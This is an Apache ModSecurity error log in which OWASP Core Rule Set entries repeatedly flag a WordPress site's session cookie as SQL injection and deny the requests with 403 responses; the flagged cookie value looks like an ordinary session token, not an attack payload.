[Mon May 11 22:26:14.534587 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7Zno_DFxNSZVmaX3P3wAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:14.534857 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7Zno_DFxNSZVmaX3P3wAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:15.106060 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7Zno_DFxNSZVmaX3P3wAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:15.332852 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7Z3o_DFxNSZVmaX3P4AAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:15.333134 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7Z3o_DFxNSZVmaX3P4AAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:15.896614 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7Z3o_DFxNSZVmaX3P4AAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:16.739423 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7aHo_DFxNSZVmaX3P4gAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:16.739706 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7aHo_DFxNSZVmaX3P4gAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:17.143802 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7aHo_DFxNSZVmaX3P4gAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:18.343554 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7ano_DFxNSZVmaX3P5AAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:18.343851 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7ano_DFxNSZVmaX3P5AAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:18.977351 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7ano_DFxNSZVmaX3P5AAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:19.631112 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7a3o_DFxNSZVmaX3P5QAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:19.631390 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7a3o_DFxNSZVmaX3P5QAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:20.232290 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7a3o_DFxNSZVmaX3P5QAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:20.635213 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7bHo_DFxNSZVmaX3P5wAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:20.635476 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7bHo_DFxNSZVmaX3P5wAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:21.265834 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7bHo_DFxNSZVmaX3P5wAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:22.538411 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7bno_DFxNSZVmaX3P6QAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:22.538697 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI7bno_DFxNSZVmaX3P6QAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:23.101991 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7bno_DFxNSZVmaX3P6QAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:23.328342 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7b3o_DFxNSZVmaX3P6gAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:23.328621 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI7b3o_DFxNSZVmaX3P6gAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:23.894707 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7b3o_DFxNSZVmaX3P6gAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:24.156938 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7cHo_DFxNSZVmaX3P7QAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:24.157236 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI7cHo_DFxNSZVmaX3P7QAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:24.526827 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7cHo_DFxNSZVmaX3P7QAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:25.146830 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7cXo_DFxNSZVmaX3P7wAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:25.147121 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI7cXo_DFxNSZVmaX3P7wAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:25.744600 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7cXo_DFxNSZVmaX3P7wAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:26.731138 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7cno_DFxNSZVmaX3P_wAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:26.731614 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI7cno_DFxNSZVmaX3P_wAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:27.460943 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7cno_DFxNSZVmaX3P_wAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:28.049518 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7dHo_DFxNSZVmaX3QAgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:28.049796 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI7dHo_DFxNSZVmaX3QAgAAANA"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:26:28.655789 2026] [security2:error] [pid 1606352:tid 1606435] [client 103.59.161.151:50692] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI7dHo_DFxNSZVmaX3QAgAAANA"], referer: https://rentparadise.fr/wp-login.php
